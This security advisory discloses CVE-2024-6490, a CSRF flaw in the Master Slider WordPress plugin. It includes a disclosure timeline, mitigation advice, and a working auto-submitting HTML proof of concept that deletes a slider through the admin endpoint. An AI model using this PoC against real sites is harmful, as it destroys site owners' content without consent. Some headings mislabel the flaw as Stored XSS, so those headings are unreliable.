CVE-2024-6490 – Master Slider – CSRF to slider deletion – POC

In the ever-evolving landscape of WordPress security, plugins often introduce as much risk as they do functionality. A recent discovery in the Master Slider plugin, a popular choice among WordPress users for creating responsive image and content sliders, underscores this issue vividly. This article delves into a critical CSRF (Cross-Site Request Forgery) vulnerability identified in the plugin, labeled under CVE-2024-6490, which allows attackers to delete sliders without authorization.

CVE	CVE-2024-6490
Plugin	Master Slider – Responsive Touch Slider <= 3.9.10
Critical	High
All Time	2 852 272
Active installations	80 000+
Publicly Published	August 1, 2024
Last Updated	August 1, 2024
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A2: Broken Authentication and Session Management
PoC	Yes
Exploit	No
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6490 https://wpscan.com/vulnerability/5a56e5aa-841d-4be5-84da-4c3b7602f053/
Plugin Security Certification by CleanTalk
Logo of the plugin

Timeline

June 4, 2024	Plugin testing and vulnerability detection in the Master Slider have been completed
June 4, 2024	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
August 1, 2024	Registered CVE-2024-6490

Discovery of the Vulnerability

The vulnerability was uncovered during routine security checks designed to assess the robustness of plugins against common web attacks. CSRF vulnerabilities exploit the trust that a site has in the user’s browser, allowing attackers to perform actions without the user’s knowledge or consent. In the case of Master Slider, the vulnerability was triggered through a seemingly innocuous piece of HTML code that could be placed on any website visited by an administrator.

Understanding of Stored XSS attack’s

Cross-Site Request Forgery (CSRF) is a well-documented web security flaw that allows an attacker to induce users to perform actions that they do not intend to perform. It targets state-changing requests like data deletion or update and can lead to significant disruptions in service. WordPress, with its extensive plugin ecosystem, is particularly vulnerable to CSRF due to the varied security practices of third-party developers.

Exploiting the Stored XSS Vulnerability

The exploitation of this CSRF vulnerability is alarmingly straightforward. An attacker only needs to trick an administrator into clicking a link or visiting a malicious website where the CSRF exploit code is silently executed. This code then sends a forged request to the WordPress site where the Master Slider is installed, leading to the deletion of sliders. The proof of concept provided shows how simple HTML and JavaScript can be used to create a form that automatically submits this request.

POC:

<html>

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php">

      <input type="hidden" name="page" value="master&#45;slider" />

      <input type="hidden" name="action" value="delete" />

      <input type="hidden" name="slider&#95;id" value="4" />

      <input type="hidden" name="paged" value="" />

      <input type="submit" value="Submit request" />

    </form>

    <script>

      document.forms[0].submit();

    </script>

  </body>

</html>

____

The risks associated with this vulnerability are not to be underestimated. For websites that rely heavily on sliders for user engagement or advertising, the unauthorized deletion of these elements could lead to a loss of revenue, diminished user experience, and damage to the site’s reputation. Furthermore, the simplicity of launching a CSRF attack makes it a likely attack vector for malicious actors targeting websites with less stringent security measures.

Recommendations for Improved Security

To mitigate this vulnerability and enhance overall site security, it is recommended that:

• Use Nonces: WordPress offers a mechanism called nonces (number used once) to protect against CSRF. Plugin developers should utilize nonces in every form and AJAX request that results in a state change.
• Educate Users: Admin users should be educated about the dangers of CSRF attacks and cautious about clicking links from unknown or untrusted sources.

By taking proactive measures to address CSRF vulnerabilities like CVE-2024-6490, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #VeryHighVulnerability

Use CleanTalk solutions to improve the security of your website

DMITRII I.